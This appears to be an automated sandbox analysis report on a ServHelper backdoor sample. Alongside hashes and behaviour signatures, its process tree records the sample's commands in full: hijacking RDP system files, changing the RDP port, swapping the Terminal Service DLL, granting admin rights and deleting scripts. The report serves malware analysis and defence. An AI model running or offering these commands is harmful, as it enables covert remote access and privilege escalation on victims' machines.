Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 04:47
Static task
static1
Behavioral task
behavioral1
Sample
cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe
-
Size
4.0MB
-
MD5
cb3cc551561883ab8fc4fb6fc837a469
-
SHA1
f74ae6d243342099d3fa500cbc630f4a244a8d82
-
SHA256
ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
-
SHA512
b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1
-
SSDEEP
49152:MgG+0nnFa5xF1Azk6GehC1Vm6ctA6Ty0pQJb4Qate1YdM1TGHgzBut:M
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2112 icacls.exe 2820 icacls.exe 1892 icacls.exe 2064 icacls.exe 3636 icacls.exe 4684 takeown.exe 2148 icacls.exe 4508 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1892 icacls.exe 2064 icacls.exe 3636 icacls.exe 4684 takeown.exe 2148 icacls.exe 4508 icacls.exe 2112 icacls.exe 2820 icacls.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe File created C:\Windows\SysWOW64\rfxvmt.dll powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1984 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 5092 powershell.exe 5092 powershell.exe 1480 powershell.exe 1480 powershell.exe 2848 powershell.exe 2848 powershell.exe 2332 powershell.exe 2332 powershell.exe 5092 powershell.exe 5092 powershell.exe 5092 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeRestorePrivilege 4508 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3332 wrote to memory of 5092 3332 cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe 91 PID 3332 wrote to memory of 5092 3332 cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe 91 PID 3332 wrote to memory of 5092 3332 cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe 91 PID 5092 wrote to memory of 3636 5092 powershell.exe 94 PID 5092 wrote to memory of 3636 5092 powershell.exe 94 PID 5092 wrote to memory of 3636 5092 powershell.exe 94 PID 3636 wrote to memory of 1340 3636 csc.exe 97 PID 3636 wrote to memory of 1340 3636 csc.exe 97 PID 3636 wrote to memory of 1340 3636 csc.exe 97 PID 5092 wrote to memory of 1480 5092 powershell.exe 98 PID 5092 wrote to memory of 1480 5092 powershell.exe 98 PID 5092 wrote to memory of 1480 5092 powershell.exe 98 PID 5092 wrote to memory of 2848 5092 powershell.exe 100 PID 5092 wrote to memory of 2848 5092 powershell.exe 100 PID 5092 wrote to memory of 2848 5092 powershell.exe 100 PID 5092 wrote to memory of 2332 5092 powershell.exe 102 PID 5092 wrote to memory of 2332 5092 powershell.exe 102 PID 5092 wrote to memory of 2332 5092 powershell.exe 102 PID 5092 wrote to memory of 4684 5092 powershell.exe 105 PID 5092 wrote to memory of 4684 5092 powershell.exe 105 PID 5092 wrote to memory of 4684 5092 powershell.exe 105 PID 5092 wrote to memory of 2148 5092 powershell.exe 106 PID 5092 wrote to memory of 2148 5092 powershell.exe 106 PID 5092 wrote to memory of 2148 5092 powershell.exe 106 PID 5092 wrote to memory of 4508 5092 powershell.exe 107 PID 5092 wrote to memory of 4508 5092 powershell.exe 107 PID 5092 wrote to memory of 4508 5092 powershell.exe 107 PID 5092 wrote to memory of 2112 5092 powershell.exe 108 PID 5092 wrote to memory of 2112 5092 powershell.exe 108 PID 5092 wrote to memory of 2112 5092 powershell.exe 108 PID 5092 wrote to memory of 2820 5092 powershell.exe 109 PID 5092 wrote to memory of 2820 5092 powershell.exe 109 PID 5092 wrote to memory of 2820 5092 powershell.exe 109 PID 5092 wrote to memory of 1892 5092 powershell.exe 110 PID 5092 wrote to memory of 1892 5092 powershell.exe 110 PID 5092 wrote to memory of 1892 5092 powershell.exe 110 PID 5092 wrote to memory of 2064 5092 powershell.exe 111 PID 5092 wrote to memory of 2064 5092 powershell.exe 111 PID 5092 wrote to memory of 2064 5092 powershell.exe 111 PID 5092 wrote to memory of 3636 5092 powershell.exe 112 PID 5092 wrote to memory of 3636 5092 powershell.exe 112 PID 5092 wrote to memory of 3636 5092 powershell.exe 112 PID 5092 wrote to memory of 3608 5092 powershell.exe 113 PID 5092 wrote to memory of 3608 5092 powershell.exe 113 PID 5092 wrote to memory of 3608 5092 powershell.exe 113 PID 5092 wrote to memory of 1984 5092 powershell.exe 114 PID 5092 wrote to memory of 1984 5092 powershell.exe 114 PID 5092 wrote to memory of 1984 5092 powershell.exe 114 PID 5092 wrote to memory of 4084 5092 powershell.exe 115 PID 5092 wrote to memory of 4084 5092 powershell.exe 115 PID 5092 wrote to memory of 4084 5092 powershell.exe 115 PID 5092 wrote to memory of 2340 5092 powershell.exe 116 PID 5092 wrote to memory of 2340 5092 powershell.exe 116 PID 5092 wrote to memory of 2340 5092 powershell.exe 116 PID 2340 wrote to memory of 3068 2340 net.exe 117 PID 2340 wrote to memory of 3068 2340 net.exe 117 PID 2340 wrote to memory of 3068 2340 net.exe 117 PID 5092 wrote to memory of 5096 5092 powershell.exe 118 PID 5092 wrote to memory of 5096 5092 powershell.exe 118 PID 5092 wrote to memory of 5096 5092 powershell.exe 118 PID 5096 wrote to memory of 3968 5096 cmd.exe 119 PID 5096 wrote to memory of 3968 5096 cmd.exe 119 PID 5096 wrote to memory of 3968 5096 cmd.exe 119 PID 3968 wrote to memory of 224 3968 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmp" "c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMP"4⤵PID:1340
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4684
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2148
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2112
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2820
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1892
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2064
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4084
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1348
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2260
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:3368
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:1616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3972
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4872
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5e2e6bbdcc5cb2b2a8e58e62380cbdeeb
SHA1fd3b0bbf8d08573d022e54ceb111e4dfe93ff752
SHA2562cf90543f0e785093db02f3ce60471d639ec8e5030a2ea0d70187ce55c248cf2
SHA51282ff827ccb3eb01f00713dfcf4d2ef8107c86d206698a366293bb723e36d9a20dba44c818d40e79824fd72c76987e71d69565a3079bccaaa0626d64a13014317
-
Filesize
1KB
MD5e2ff148a195602967a078ffa782d563e
SHA1e6f8436b141fd4a67b835ac01d4db9ac91430d87
SHA25627145f5a87f8447c15d9e5a4d1febceb56da0933d28fa8f233262dc116065374
SHA512eb84de59250991956af5d1fd5e52c6587040db967493e9f3c84ef98161055758ec1607ff24fa8bf36208dd1a25aa4076ebb63e5a73ae863c19bed9d0ee3cfb33
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD5841cc93778b4ec353d0075d717b90df4
SHA1287f652b7be199d127aab4655055654a6ea2bed6
SHA25677f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1
SHA512a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541
-
Filesize
3KB
MD509102fe0b7e6302f160ab0fcde307c4b
SHA12b7a7bca1a5ac90613abad1941aa3d25c5288831
SHA256fc08a3e14a7b6f71ca88cc749905934e63eb813c22d765aa6a3c84b61a75cfeb
SHA5125cc111e0ee3b0f7f841456cf26f2593fdf5dad705c61829af2c775a3fd5e5b27345d911f64aac2d156be3942eede99512248e6f5aab9d07e6e3b2ce71c3f6ec4
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5216a7f213b3840a471c20b967436ccc5
SHA1cc95009d8a4be42486538345d9d33037c15c48ab
SHA256ceb2031e43595541e82fd58c550b239b3203de44aaf02d8056b64ffbb65aa64c
SHA5129c99222ec93600afbc555130c993a2ad4d6664cf1359b2be24d1d9515a823b2ec4af640c37dca036f2510c06fdbd85a64154d6dc70b73fd678de4bc07d9e7d38
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
369B
MD5947abf591dbf321409f38aeb2a3a3072
SHA19ac4db381c0a1c257d4886bfbc630c7e8469be82
SHA256a888796c34418732d33663846092d16d9940d32d4f5ad2f2183024147f8be8db
SHA51287aeb78d21518280d1c012d9bc115eed592e44025a8843fc745a4d11efee76ea35f26081240a2a72cf2e3d88f4eb9b148e1a06489ed2c82c41ca371b96c8826c